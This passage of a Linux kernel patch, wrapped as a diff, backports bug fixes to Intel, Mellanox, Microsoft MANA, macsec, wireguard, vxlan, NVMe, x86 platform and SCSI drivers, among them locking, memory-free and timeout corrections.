++		spin_unlock_bh(&adapter->fdir_fltr_lock);
+ 		cmd->data = IAVF_MAX_FDIR_FILTERS;
+ 		ret = 0;
+ 		break;
+diff --git a/drivers/net/ethernet/intel/iavf/iavf_fdir.c b/drivers/net/ethernet/intel/iavf/iavf_fdir.c
+index 6146203efd84a..505e82ebafe47 100644
+--- a/drivers/net/ethernet/intel/iavf/iavf_fdir.c
++++ b/drivers/net/ethernet/intel/iavf/iavf_fdir.c
+@@ -722,7 +722,9 @@ void iavf_print_fdir_fltr(struct iavf_adapter *adapter, struct iavf_fdir_fltr *f
+ bool iavf_fdir_is_dup_fltr(struct iavf_adapter *adapter, struct iavf_fdir_fltr *fltr)
+ {
+ 	struct iavf_fdir_fltr *tmp;
++	bool ret = false;
+ 
++	spin_lock_bh(&adapter->fdir_fltr_lock);
+ 	list_for_each_entry(tmp, &adapter->fdir_list_head, list) {
+ 		if (tmp->flow_type != fltr->flow_type)
+ 			continue;
+@@ -732,11 +734,14 @@ bool iavf_fdir_is_dup_fltr(struct iavf_adapter *adapter, struct iavf_fdir_fltr *
+ 		    !memcmp(&tmp->ip_data, &fltr->ip_data,
+ 			    sizeof(fltr->ip_data)) &&
+ 		    !memcmp(&tmp->ext_data, &fltr->ext_data,
+-			    sizeof(fltr->ext_data)))
+-			return true;
++			    sizeof(fltr->ext_data))) {
++			ret = true;
++			break;
++		}
+ 	}
++	spin_unlock_bh(&adapter->fdir_fltr_lock);
+ 
+-	return false;
++	return ret;
+ }
+ 
+ /**
+diff --git a/drivers/net/ethernet/marvell/prestera/prestera_router.c b/drivers/net/ethernet/marvell/prestera/prestera_router.c
+index a9a1028cb17bb..de317179a7dcc 100644
+--- a/drivers/net/ethernet/marvell/prestera/prestera_router.c
++++ b/drivers/net/ethernet/marvell/prestera/prestera_router.c
+@@ -166,11 +166,11 @@ prestera_util_neigh2nc_key(struct prestera_switch *sw, struct neighbour *n,
+ 
+ static bool __prestera_fi_is_direct(struct fib_info *fi)
+ {
+-	struct fib_nh *fib_nh;
++	struct fib_nh_common *fib_nhc;
+ 
+ 	if (fib_info_num_path(fi) == 1) {
+-		fib_nh = fib_info_nh(fi, 0);
+-		if (fib_nh->fib_nh_gw_family == AF_UNSPEC)
++		fib_nhc = fib_info_nhc(fi, 0);
++		if (fib_nhc->nhc_gw_family == AF_UNSPEC)
+ 			return true;
+ 	}
+ 
+@@ -261,7 +261,7 @@ static bool
+ __prestera_util_kern_n_is_reachable_v4(u32 tb_id, __be32 *addr,
+ 				       struct net_device *dev)
+ {
+-	struct fib_nh *fib_nh;
++	struct fib_nh_common *fib_nhc;
+ 	struct fib_result res;
+ 	bool reachable;
+ 
+@@ -269,8 +269,8 @@ __prestera_util_kern_n_is_reachable_v4(u32 tb_id, __be32 *addr,
+ 
+ 	if (!prestera_util_kern_get_route(&res, tb_id, addr))
+ 		if (prestera_fi_is_direct(res.fi)) {
+-			fib_nh = fib_info_nh(res.fi, 0);
+-			if (dev == fib_nh->fib_nh_dev)
++			fib_nhc = fib_info_nhc(res.fi, 0);
++			if (dev == fib_nhc->nhc_dev)
+ 				reachable = true;
+ 		}
+ 
+@@ -324,7 +324,7 @@ prestera_kern_fib_info_nhc(struct fib_notifier_info *info, int n)
+ 	if (info->family == AF_INET) {
+ 		fen4_info = container_of(info, struct fib_entry_notifier_info,
+ 					 info);
+-		return &fib_info_nh(fen4_info->fi, n)->nh_common;
++		return fib_info_nhc(fen4_info->fi, n);
+ 	} else if (info->family == AF_INET6) {
+ 		fen6_info = container_of(info, struct fib6_entry_notifier_info,
+ 					 info);
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lag/port_sel.c b/drivers/net/ethernet/mellanox/mlx5/core/lag/port_sel.c
+index d3a3fe4ce6702..7d9bbb494d95b 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lag/port_sel.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lag/port_sel.c
+@@ -574,7 +574,7 @@ static int __mlx5_lag_modify_definers_destinations(struct mlx5_lag *ldev,
+ 	for (i = 0; i < ldev->ports; i++) {
+ 		for (j = 0; j < ldev->buckets; j++) {
+ 			idx = i * ldev->buckets + j;
+-			if (ldev->v2p_map[i] == ports[i])
++			if (ldev->v2p_map[idx] == ports[idx])
+ 				continue;
+ 
+ 			dest.vport.vhca_id = MLX5_CAP_GEN(ldev->pf[ports[idx] - 1].dev,
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/lib/clock.c b/drivers/net/ethernet/mellanox/mlx5/core/lib/clock.c
+index d7ddfc489536e..2ac255bb918ba 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/lib/clock.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/lib/clock.c
+@@ -198,10 +198,15 @@ static void mlx5_timestamp_overflow(struct work_struct *work)
+ 	clock = container_of(timer, struct mlx5_clock, timer);
+ 	mdev = container_of(clock, struct mlx5_core_dev, clock);
+ 
++	if (mdev->state == MLX5_DEVICE_STATE_INTERNAL_ERROR)
++		goto out;
++
+ 	write_seqlock_irqsave(&clock->lock, flags);
+ 	timecounter_read(&timer->tc);
+ 	mlx5_update_clock_info_page(mdev);
+ 	write_sequnlock_irqrestore(&clock->lock, flags);
++
++out:
+ 	schedule_delayed_work(&timer->overflow_work, timer->overflow_period);
+ }
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+index 077204929fe4a..6ab0642e9de78 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/main.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c
+@@ -1794,7 +1794,7 @@ static pci_ers_result_t mlx5_pci_err_detected(struct pci_dev *pdev,
+ 
+ 	mlx5_enter_error_state(dev, false);
+ 	mlx5_error_sw_reset(dev);
+-	mlx5_unload_one(dev, true);
++	mlx5_unload_one(dev, false);
+ 	mlx5_drain_health_wq(dev);
+ 	mlx5_pci_disable_device(dev);
+ 
+diff --git a/drivers/net/ethernet/mellanox/mlx5/core/sriov.c b/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
+index 20d7662c10fb6..5f2195e65dd62 100644
+--- a/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
++++ b/drivers/net/ethernet/mellanox/mlx5/core/sriov.c
+@@ -264,8 +264,7 @@ static u16 mlx5_get_max_vfs(struct mlx5_core_dev *dev)
+ 		host_total_vfs = MLX5_GET(query_esw_functions_out, out,
+ 					  host_params_context.host_total_vfs);
+ 		kvfree(out);
+-		if (host_total_vfs)
+-			return host_total_vfs;
++		return host_total_vfs;
+ 	}
+ 
+ done:
+diff --git a/drivers/net/ethernet/microsoft/mana/mana_en.c b/drivers/net/ethernet/microsoft/mana/mana_en.c
+index 27a0f3af8aab4..4f4204432aaa3 100644
+--- a/drivers/net/ethernet/microsoft/mana/mana_en.c
++++ b/drivers/net/ethernet/microsoft/mana/mana_en.c
+@@ -8,6 +8,7 @@
+ #include <linux/ethtool.h>
+ #include <linux/filter.h>
+ #include <linux/mm.h>
++#include <linux/pci.h>
+ 
+ #include <net/checksum.h>
+ #include <net/ip6_checksum.h>
+@@ -1972,9 +1973,12 @@ int mana_attach(struct net_device *ndev)
+ static int mana_dealloc_queues(struct net_device *ndev)
+ {
+ 	struct mana_port_context *apc = netdev_priv(ndev);
++	unsigned long timeout = jiffies + 120 * HZ;
+ 	struct gdma_dev *gd = apc->ac->gdma_dev;
+ 	struct mana_txq *txq;
++	struct sk_buff *skb;
+ 	int i, err;
++	u32 tsleep;
+ 
+ 	if (apc->port_is_up)
+ 		return -EINVAL;
+@@ -1990,15 +1994,40 @@ static int mana_dealloc_queues(struct net_device *ndev)
+ 	 * to false, but it doesn't matter since mana_start_xmit() drops any
+ 	 * new packets due to apc->port_is_up being false.
+ 	 *
+-	 * Drain all the in-flight TX packets
++	 * Drain all the in-flight TX packets.
++	 * A timeout of 120 seconds for all the queues is used.
++	 * This will break the while loop when h/w is not responding.
++	 * This value of 120 has been decided here considering max
++	 * number of queues.
+ 	 */
++
+ 	for (i = 0; i < apc->num_queues; i++) {
+ 		txq = &apc->tx_qp[i].txq;
+-
+-		while (atomic_read(&txq->pending_sends) > 0)
+-			usleep_range(1000, 2000);
++		tsleep = 1000;
++		while (atomic_read(&txq->pending_sends) > 0 &&
++		       time_before(jiffies, timeout)) {
++			usleep_range(tsleep, tsleep + 1000);
++			tsleep <<= 1;
++		}
++		if (atomic_read(&txq->pending_sends)) {
++			err = pcie_flr(to_pci_dev(gd->gdma_context->dev));
++			if (err) {
++				netdev_err(ndev, "flr failed %d with %d pkts pending in txq %u\n",
++					   err, atomic_read(&txq->pending_sends),
++					   txq->gdma_txq_id);
++			}
++			break;
++		}
+ 	}
+ 
++	for (i = 0; i < apc->num_queues; i++) {
++		txq = &apc->tx_qp[i].txq;
++		while ((skb = skb_dequeue(&txq->pending_skbs))) {
++			mana_unmap_skb(skb, apc);
++			dev_kfree_skb_any(skb);
++		}
++		atomic_set(&txq->pending_sends, 0);
++	}
+ 	/* We're 100% sure the queues can no longer be woken up, because
+ 	 * we're sure now mana_poll_tx_cq() can't be running.
+ 	 */
+diff --git a/drivers/net/macsec.c b/drivers/net/macsec.c
+index 983cabf9a0f67..6a7965ed63001 100644
+--- a/drivers/net/macsec.c
++++ b/drivers/net/macsec.c
+@@ -743,7 +743,7 @@ static bool macsec_post_decrypt(struct sk_buff *skb, struct macsec_secy *secy, u
+ 		u64_stats_update_begin(&rxsc_stats->syncp);
+ 		rxsc_stats->stats.InPktsLate++;
+ 		u64_stats_update_end(&rxsc_stats->syncp);
+-		secy->netdev->stats.rx_dropped++;
++		DEV_STATS_INC(secy->netdev, rx_dropped);
+ 		return false;
+ 	}
+ 
+@@ -767,7 +767,7 @@ static bool macsec_post_decrypt(struct sk_buff *skb, struct macsec_secy *secy, u
+ 			rxsc_stats->stats.InPktsNotValid++;
+ 			u64_stats_update_end(&rxsc_stats->syncp);
+ 			this_cpu_inc(rx_sa->stats->InPktsNotValid);
+-			secy->netdev->stats.rx_errors++;
++			DEV_STATS_INC(secy->netdev, rx_errors);
+ 			return false;
+ 		}
+ 
+@@ -1059,7 +1059,7 @@ static enum rx_handler_result handle_not_macsec(struct sk_buff *skb)
+ 			u64_stats_update_begin(&secy_stats->syncp);
+ 			secy_stats->stats.InPktsNoTag++;
+ 			u64_stats_update_end(&secy_stats->syncp);
+-			macsec->secy.netdev->stats.rx_dropped++;
++			DEV_STATS_INC(macsec->secy.netdev, rx_dropped);
+ 			continue;
+ 		}
+ 
+@@ -1169,7 +1169,7 @@ static rx_handler_result_t macsec_handle_frame(struct sk_buff **pskb)
+ 		u64_stats_update_begin(&secy_stats->syncp);
+ 		secy_stats->stats.InPktsBadTag++;
+ 		u64_stats_update_end(&secy_stats->syncp);
+-		secy->netdev->stats.rx_errors++;
++		DEV_STATS_INC(secy->netdev, rx_errors);
+ 		goto drop_nosa;
+ 	}
+ 
+@@ -1186,7 +1186,7 @@ static rx_handler_result_t macsec_handle_frame(struct sk_buff **pskb)
+ 			u64_stats_update_begin(&rxsc_stats->syncp);
+ 			rxsc_stats->stats.InPktsNotUsingSA++;
+ 			u64_stats_update_end(&rxsc_stats->syncp);
+-			secy->netdev->stats.rx_errors++;
++			DEV_STATS_INC(secy->netdev, rx_errors);
+ 			if (active_rx_sa)
+ 				this_cpu_inc(active_rx_sa->stats->InPktsNotUsingSA);
+ 			goto drop_nosa;
+@@ -1220,7 +1220,7 @@ static rx_handler_result_t macsec_handle_frame(struct sk_buff **pskb)
+ 			u64_stats_update_begin(&rxsc_stats->syncp);
+ 			rxsc_stats->stats.InPktsLate++;
+ 			u64_stats_update_end(&rxsc_stats->syncp);
+-			macsec->secy.netdev->stats.rx_dropped++;
++			DEV_STATS_INC(macsec->secy.netdev, rx_dropped);
+ 			goto drop;
+ 		}
+ 	}
+@@ -1261,7 +1261,7 @@ deliver:
+ 	if (ret == NET_RX_SUCCESS)
+ 		count_rx(dev, len);
+ 	else
+-		macsec->secy.netdev->stats.rx_dropped++;
++		DEV_STATS_INC(macsec->secy.netdev, rx_dropped);
+ 
+ 	rcu_read_unlock();
+ 
+@@ -1298,7 +1298,7 @@ nosci:
+ 			u64_stats_update_begin(&secy_stats->syncp);
+ 			secy_stats->stats.InPktsNoSCI++;
+ 			u64_stats_update_end(&secy_stats->syncp);
+-			macsec->secy.netdev->stats.rx_errors++;
++			DEV_STATS_INC(macsec->secy.netdev, rx_errors);
+ 			continue;
+ 		}
+ 
+@@ -1317,7 +1317,7 @@ nosci:
+ 			secy_stats->stats.InPktsUnknownSCI++;
+ 			u64_stats_update_end(&secy_stats->syncp);
+ 		} else {
+-			macsec->secy.netdev->stats.rx_dropped++;
++			DEV_STATS_INC(macsec->secy.netdev, rx_dropped);
+ 		}
+ 	}
+ 
+@@ -3418,7 +3418,7 @@ static netdev_tx_t macsec_start_xmit(struct sk_buff *skb,
+ 
+ 	if (!secy->operational) {
+ 		kfree_skb(skb);
+-		dev->stats.tx_dropped++;
++		DEV_STATS_INC(dev, tx_dropped);
+ 		return NETDEV_TX_OK;
+ 	}
+ 
+@@ -3426,7 +3426,7 @@ static netdev_tx_t macsec_start_xmit(struct sk_buff *skb,
+ 	skb = macsec_encrypt(skb, dev);
+ 	if (IS_ERR(skb)) {
+ 		if (PTR_ERR(skb) != -EINPROGRESS)
+-			dev->stats.tx_dropped++;
++			DEV_STATS_INC(dev, tx_dropped);
+ 		return NETDEV_TX_OK;
+ 	}
+ 
+@@ -3663,9 +3663,9 @@ static void macsec_get_stats64(struct net_device *dev,
+ 
+ 	dev_fetch_sw_netstats(s, dev->tstats);
+ 
+-	s->rx_dropped = dev->stats.rx_dropped;
+-	s->tx_dropped = dev->stats.tx_dropped;
+-	s->rx_errors = dev->stats.rx_errors;
++	s->rx_dropped = atomic_long_read(&dev->stats.__rx_dropped);
++	s->tx_dropped = atomic_long_read(&dev->stats.__tx_dropped);
++	s->rx_errors = atomic_long_read(&dev->stats.__rx_errors);
+ }
+ 
+ static int macsec_get_iflink(const struct net_device *dev)
+diff --git a/drivers/net/phy/at803x.c b/drivers/net/phy/at803x.c
+index d499659075614..61824a463df85 100644
+--- a/drivers/net/phy/at803x.c
++++ b/drivers/net/phy/at803x.c
+@@ -2087,8 +2087,6 @@ static struct phy_driver at803x_driver[] = {
+ 	.flags			= PHY_POLL_CABLE_TEST,
+ 	.config_init		= at803x_config_init,
+ 	.link_change_notify	= at803x_link_change_notify,
+-	.set_wol		= at803x_set_wol,
+-	.get_wol		= at803x_get_wol,
+ 	.suspend		= at803x_suspend,
+ 	.resume			= at803x_resume,
+ 	/* PHY_BASIC_FEATURES */
+diff --git a/drivers/net/tun.c b/drivers/net/tun.c
+index 228f5f9ef1dde..7544df1ff50ec 100644
+--- a/drivers/net/tun.c
++++ b/drivers/net/tun.c
+@@ -1588,7 +1588,7 @@ static bool tun_can_build_skb(struct tun_struct *tun, struct tun_file *tfile,
+ 	if (zerocopy)
+ 		return false;
+ 
+-	if (SKB_DATA_ALIGN(len + TUN_RX_PAD) +
++	if (SKB_DATA_ALIGN(len + TUN_RX_PAD + XDP_PACKET_HEADROOM) +
+ 	    SKB_DATA_ALIGN(sizeof(struct skb_shared_info)) > PAGE_SIZE)
+ 		return false;
+ 
+diff --git a/drivers/net/vxlan/vxlan_vnifilter.c b/drivers/net/vxlan/vxlan_vnifilter.c
+index 3e04af4c5daa1..c5cf55030158f 100644
+--- a/drivers/net/vxlan/vxlan_vnifilter.c
++++ b/drivers/net/vxlan/vxlan_vnifilter.c
+@@ -713,6 +713,12 @@ static struct vxlan_vni_node *vxlan_vni_alloc(struct vxlan_dev *vxlan,
+ 	return vninode;
+ }
+ 
++static void vxlan_vni_free(struct vxlan_vni_node *vninode)
++{
++	free_percpu(vninode->stats);
++	kfree(vninode);
++}
++
+ static int vxlan_vni_add(struct vxlan_dev *vxlan,
+ 			 struct vxlan_vni_group *vg,
+ 			 u32 vni, union vxlan_addr *group,
+@@ -740,7 +746,7 @@ static int vxlan_vni_add(struct vxlan_dev *vxlan,
+ 					    &vninode->vnode,
+ 					    vxlan_vni_rht_params);
+ 	if (err) {
+-		kfree(vninode);
++		vxlan_vni_free(vninode);
+ 		return err;
+ 	}
+ 
+@@ -763,8 +769,7 @@ static void vxlan_vni_node_rcu_free(struct rcu_head *rcu)
+ 	struct vxlan_vni_node *v;
+ 
+ 	v = container_of(rcu, struct vxlan_vni_node, rcu);
+-	free_percpu(v->stats);
+-	kfree(v);
++	vxlan_vni_free(v);
+ }
+ 
+ static int vxlan_vni_del(struct vxlan_dev *vxlan,
+diff --git a/drivers/net/wireguard/allowedips.c b/drivers/net/wireguard/allowedips.c
+index 5bf7822c53f18..0ba714ca5185c 100644
+--- a/drivers/net/wireguard/allowedips.c
++++ b/drivers/net/wireguard/allowedips.c
+@@ -6,7 +6,7 @@
+ #include "allowedips.h"
+ #include "peer.h"
+ 
+-enum { MAX_ALLOWEDIPS_BITS = 128 };
++enum { MAX_ALLOWEDIPS_DEPTH = 129 };
+ 
+ static struct kmem_cache *node_cache;
+ 
+@@ -42,7 +42,7 @@ static void push_rcu(struct allowedips_node **stack,
+ 		     struct allowedips_node __rcu *p, unsigned int *len)
+ {
+ 	if (rcu_access_pointer(p)) {
+-		if (WARN_ON(IS_ENABLED(DEBUG) && *len >= MAX_ALLOWEDIPS_BITS))
++		if (WARN_ON(IS_ENABLED(DEBUG) && *len >= MAX_ALLOWEDIPS_DEPTH))
+ 			return;
+ 		stack[(*len)++] = rcu_dereference_raw(p);
+ 	}
+@@ -55,7 +55,7 @@ static void node_free_rcu(struct rcu_head *rcu)
+ 
+ static void root_free_rcu(struct rcu_head *rcu)
+ {
+-	struct allowedips_node *node, *stack[MAX_ALLOWEDIPS_BITS] = {
++	struct allowedips_node *node, *stack[MAX_ALLOWEDIPS_DEPTH] = {
+ 		container_of(rcu, struct allowedips_node, rcu) };
+ 	unsigned int len = 1;
+ 
+@@ -68,7 +68,7 @@ static void root_free_rcu(struct rcu_head *rcu)
+ 
+ static void root_remove_peer_lists(struct allowedips_node *root)
+ {
+-	struct allowedips_node *node, *stack[MAX_ALLOWEDIPS_BITS] = { root };
++	struct allowedips_node *node, *stack[MAX_ALLOWEDIPS_DEPTH] = { root };
+ 	unsigned int len = 1;
+ 
+ 	while (len > 0 && (node = stack[--len])) {
+diff --git a/drivers/net/wireguard/selftest/allowedips.c b/drivers/net/wireguard/selftest/allowedips.c
+index 19eac00b23814..c51c794e70a0e 100644
+--- a/drivers/net/wireguard/selftest/allowedips.c
++++ b/drivers/net/wireguard/selftest/allowedips.c
+@@ -593,16 +593,20 @@ bool __init wg_allowedips_selftest(void)
+ 	wg_allowedips_remove_by_peer(&t, a, &mutex);
+ 	test_negative(4, a, 192, 168, 0, 1);
+ 
+-	/* These will hit the WARN_ON(len >= MAX_ALLOWEDIPS_BITS) in free_node
++	/* These will hit the WARN_ON(len >= MAX_ALLOWEDIPS_DEPTH) in free_node
+ 	 * if something goes wrong.
+ 	 */
+-	for (i = 0; i < MAX_ALLOWEDIPS_BITS; ++i) {
+-		part = cpu_to_be64(~(1LLU << (i % 64)));
+-		memset(&ip, 0xff, 16);
+-		memcpy((u8 *)&ip + (i < 64) * 8, &part, 8);
++	for (i = 0; i < 64; ++i) {
++		part = cpu_to_be64(~0LLU << i);
++		memset(&ip, 0xff, 8);
++		memcpy((u8 *)&ip + 8, &part, 8);
++		wg_allowedips_insert_v6(&t, &ip, 128, a, &mutex);
++		memcpy(&ip, &part, 8);
++		memset((u8 *)&ip + 8, 0, 8);
+ 		wg_allowedips_insert_v6(&t, &ip, 128, a, &mutex);
+ 	}
+-
++	memset(&ip, 0, 16);
++	wg_allowedips_insert_v6(&t, &ip, 128, a, &mutex);
+ 	wg_allowedips_free(&t, &mutex);
+ 
+ 	wg_allowedips_init(&t);
+diff --git a/drivers/net/wireless/realtek/rtw89/mac.c b/drivers/net/wireless/realtek/rtw89/mac.c
+index 077fddc5fa1ea..4a1c9e18c5301 100644
+--- a/drivers/net/wireless/realtek/rtw89/mac.c
++++ b/drivers/net/wireless/realtek/rtw89/mac.c
+@@ -2209,7 +2209,7 @@ static int cmac_dma_init(struct rtw89_dev *rtwdev, u8 mac_idx)
+ 	u32 reg;
+ 	int ret;
+ 
+-	if (chip_id != RTL8852A && chip_id != RTL8852B)
++	if (chip_id != RTL8852B)
+ 		return 0;
+ 
+ 	ret = rtw89_mac_check_mac_en(rtwdev, mac_idx, RTW89_CMAC_SEL);
+diff --git a/drivers/nvme/host/pci.c b/drivers/nvme/host/pci.c
+index ce2e628f94a05..b30269f5e68fb 100644
+--- a/drivers/nvme/host/pci.c
++++ b/drivers/nvme/host/pci.c
+@@ -3504,7 +3504,8 @@ static const struct pci_device_id nvme_id_table[] = {
+ 	{ PCI_DEVICE(0x1d97, 0x2263),   /* SPCC */
+ 		.driver_data = NVME_QUIRK_DISABLE_WRITE_ZEROES, },
+ 	{ PCI_DEVICE(0x144d, 0xa80b),   /* Samsung PM9B1 256G and 512G */
+-		.driver_data = NVME_QUIRK_DISABLE_WRITE_ZEROES, },
++		.driver_data = NVME_QUIRK_DISABLE_WRITE_ZEROES |
++				NVME_QUIRK_BOGUS_NID, },
+ 	{ PCI_DEVICE(0x144d, 0xa809),   /* Samsung MZALQ256HBJD 256G */
+ 		.driver_data = NVME_QUIRK_DISABLE_WRITE_ZEROES, },
+ 	{ PCI_DEVICE(0x1cc4, 0x6303),   /* UMIS RPJTJ512MGE1QDY 512G */
+diff --git a/drivers/nvme/host/rdma.c b/drivers/nvme/host/rdma.c
+index 80383213b8828..c478480f54aa2 100644
+--- a/drivers/nvme/host/rdma.c
++++ b/drivers/nvme/host/rdma.c
+@@ -923,6 +923,7 @@ static int nvme_rdma_configure_io_queues(struct nvme_rdma_ctrl *ctrl, bool new)
+ 		goto out_cleanup_tagset;
+ 
+ 	if (!new) {
++		nvme_start_freeze(&ctrl->ctrl);
+ 		nvme_start_queues(&ctrl->ctrl);
+ 		if (!nvme_wait_freeze_timeout(&ctrl->ctrl, NVME_IO_TIMEOUT)) {
+ 			/*
+@@ -931,6 +932,7 @@ static int nvme_rdma_configure_io_queues(struct nvme_rdma_ctrl *ctrl, bool new)
+ 			 * to be safe.
+ 			 */
+ 			ret = -ENODEV;
++			nvme_unfreeze(&ctrl->ctrl);
+ 			goto out_wait_freeze_timed_out;
+ 		}
+ 		blk_mq_update_nr_hw_queues(ctrl->ctrl.tagset,
+@@ -980,7 +982,6 @@ static void nvme_rdma_teardown_io_queues(struct nvme_rdma_ctrl *ctrl,
+ 		bool remove)
+ {
+ 	if (ctrl->ctrl.queue_count > 1) {
+-		nvme_start_freeze(&ctrl->ctrl);
+ 		nvme_stop_queues(&ctrl->ctrl);
+ 		nvme_sync_io_queues(&ctrl->ctrl);
+ 		nvme_rdma_stop_io_queues(ctrl);
+diff --git a/drivers/nvme/host/tcp.c b/drivers/nvme/host/tcp.c
+index 8f17cbec5a0e4..f2fedd25915f9 100644
+--- a/drivers/nvme/host/tcp.c
++++ b/drivers/nvme/host/tcp.c
+@@ -1890,6 +1890,7 @@ static int nvme_tcp_configure_io_queues(struct nvme_ctrl *ctrl, bool new)
+ 		goto out_cleanup_connect_q;
+ 
+ 	if (!new) {
++		nvme_start_freeze(ctrl);
+ 		nvme_start_queues(ctrl);
+ 		if (!nvme_wait_freeze_timeout(ctrl, NVME_IO_TIMEOUT)) {
+ 			/*
+@@ -1898,6 +1899,7 @@ static int nvme_tcp_configure_io_queues(struct nvme_ctrl *ctrl, bool new)
+ 			 * to be safe.
+ 			 */
+ 			ret = -ENODEV;
++			nvme_unfreeze(ctrl);
+ 			goto out_wait_freeze_timed_out;
+ 		}
+ 		blk_mq_update_nr_hw_queues(ctrl->tagset,
+@@ -2002,7 +2004,6 @@ static void nvme_tcp_teardown_io_queues(struct nvme_ctrl *ctrl,
+ 	if (ctrl->queue_count <= 1)
+ 		return;
+ 	nvme_stop_admin_queue(ctrl);
+-	nvme_start_freeze(ctrl);
+ 	nvme_stop_queues(ctrl);
+ 	nvme_sync_io_queues(ctrl);
+ 	nvme_tcp_stop_io_queues(ctrl);
+diff --git a/drivers/platform/x86/serial-multi-instantiate.c b/drivers/platform/x86/serial-multi-instantiate.c
+index 5362f1a7b77c5..7a9c758e95472 100644
+--- a/drivers/platform/x86/serial-multi-instantiate.c
++++ b/drivers/platform/x86/serial-multi-instantiate.c
+@@ -21,6 +21,7 @@
+ #define IRQ_RESOURCE_NONE	0
+ #define IRQ_RESOURCE_GPIO	1
+ #define IRQ_RESOURCE_APIC	2
++#define IRQ_RESOURCE_AUTO   3
+ 
+ enum smi_bus_type {
+ 	SMI_I2C,
+@@ -52,6 +53,18 @@ static int smi_get_irq(struct platform_device *pdev, struct acpi_device *adev,
+ 	int ret;
+ 
+ 	switch (inst->flags & IRQ_RESOURCE_TYPE) {
++	case IRQ_RESOURCE_AUTO:
++		ret = acpi_dev_gpio_irq_get(adev, inst->irq_idx);
++		if (ret > 0) {
++			dev_dbg(&pdev->dev, "Using gpio irq\n");
++			break;
++		}
++		ret = platform_get_irq(pdev, inst->irq_idx);
++		if (ret > 0) {
++			dev_dbg(&pdev->dev, "Using platform irq\n");
++			break;
++		}
++		break;
+ 	case IRQ_RESOURCE_GPIO:
+ 		ret = acpi_dev_gpio_irq_get(adev, inst->irq_idx);
+ 		break;
+@@ -308,10 +321,23 @@ static const struct smi_node int3515_data = {
+ 
+ static const struct smi_node cs35l41_hda = {
+ 	.instances = {
+-		{ "cs35l41-hda", IRQ_RESOURCE_GPIO, 0 },
+-		{ "cs35l41-hda", IRQ_RESOURCE_GPIO, 0 },
+-		{ "cs35l41-hda", IRQ_RESOURCE_GPIO, 0 },
+-		{ "cs35l41-hda", IRQ_RESOURCE_GPIO, 0 },
++		{ "cs35l41-hda", IRQ_RESOURCE_AUTO, 0 },
++		{ "cs35l41-hda", IRQ_RESOURCE_AUTO, 0 },
++		{ "cs35l41-hda", IRQ_RESOURCE_AUTO, 0 },
++		{ "cs35l41-hda", IRQ_RESOURCE_AUTO, 0 },
++		{}
++	},
++	.bus_type = SMI_AUTO_DETECT,
++};
++
++static const struct smi_node cs35l56_hda = {
++	.instances = {
++		{ "cs35l56-hda", IRQ_RESOURCE_AUTO, 0 },
++		{ "cs35l56-hda", IRQ_RESOURCE_AUTO, 0 },
++		{ "cs35l56-hda", IRQ_RESOURCE_AUTO, 0 },
++		{ "cs35l56-hda", IRQ_RESOURCE_AUTO, 0 },
++		/* a 5th entry is an alias address, not a real device */
++		{ "cs35l56-hda_dummy_dev" },
+ 		{}
+ 	},
+ 	.bus_type = SMI_AUTO_DETECT,
+@@ -325,6 +351,7 @@ static const struct acpi_device_id smi_acpi_ids[] = {
+ 	{ "BSG1160", (unsigned long)&bsg1160_data },
+ 	{ "BSG2150", (unsigned long)&bsg2150_data },
+ 	{ "CSC3551", (unsigned long)&cs35l41_hda },
++	{ "CSC3556", (unsigned long)&cs35l56_hda },
+ 	{ "INT3515", (unsigned long)&int3515_data },
+ 	/* Non-conforming _HID for Cirrus Logic already released */
+ 	{ "CLSA0100", (unsigned long)&cs35l41_hda },
+diff --git a/drivers/scsi/53c700.c b/drivers/scsi/53c700.c
+index e1e4f9d108879..857be0f3ae5b9 100644
+--- a/drivers/scsi/53c700.c
++++ b/drivers/scsi/53c700.c
+@@ -1598,7 +1598,7 @@ NCR_700_intr(int irq, void *dev_id)
+ 				printk("scsi%d (%d:%d) PHASE MISMATCH IN SEND MESSAGE %d remain, return %p[%04x], phase %s\n", host->host_no, pun, lun, count, (void *)temp, temp - hostdata->pScript, sbcl_to_string(NCR_700_readb(host, SBCL_REG)));
+ #endif
+ 				resume_offset = hostdata->pScript + Ent_SendMessagePhaseMismatch;
+-			} else if(dsp >= to32bit(&slot->pSG[0].ins) &&
++			} else if (slot && dsp >= to32bit(&slot->pSG[0].ins) &&
+ 				  dsp <= to32bit(&slot->pSG[NCR_700_SG_SEGMENTS].ins)) {
+ 				int data_transfer = NCR_700_readl(host, DBC_REG) & 0xffffff;
+ 				int SGcount = (dsp - to32bit(&slot->pSG[0].ins))/sizeof(struct NCR_700_SG_List);
+diff --git a/drivers/scsi/fnic/fnic.h b/drivers/scsi/fnic/fnic.h
+index d82de34f6fd73..e51e92f932fa8 100644
+--- a/drivers/scsi/fnic/fnic.h
++++ b/drivers/scsi/fnic/fnic.h
+@@ -27,7 +27,7 @@
+ 
+ #define DRV_NAME		"fnic"
+ #define DRV_DESCRIPTION		"Cisco FCoE HBA Driver"
+-#define DRV_VERSION		"1.6.0.54"
++#define DRV_VERSION		"1.6.0.55"
+ #define PFX			DRV_NAME ": "
+ #define DFX                     DRV_NAME "%d: "
+ 
+diff --git a/drivers/scsi/fnic/fnic_scsi.c b/drivers/scsi/fnic/fnic_scsi.c
+index 26dbd347156ef..be89ce96df46c 100644
+--- a/drivers/scsi/fnic/fnic_scsi.c
++++ b/drivers/scsi/fnic/fnic_scsi.c
+@@ -2139,7 +2139,7 @@ static int fnic_clean_pending_aborts(struct fnic *fnic,
+ 				     bool new_sc)
+ 
+ {
+-	int ret = SUCCESS;
++	int ret = 0;
+ 	struct fnic_pending_aborts_iter_data iter_data = {
+ 		.fnic = fnic,
+ 		.lun_dev = lr_sc->device,
+@@ -2159,9 +2159,11 @@ static int fnic_clean_pending_aborts(struct fnic *fnic,
+ 
+ 	/* walk again to check, if IOs are still pending in fw */
+ 	if (fnic_is_abts_pending(fnic, lr_sc))
+-		ret = FAILED;
++		ret = 1;
+ 
+ clean_pending_aborts_end:
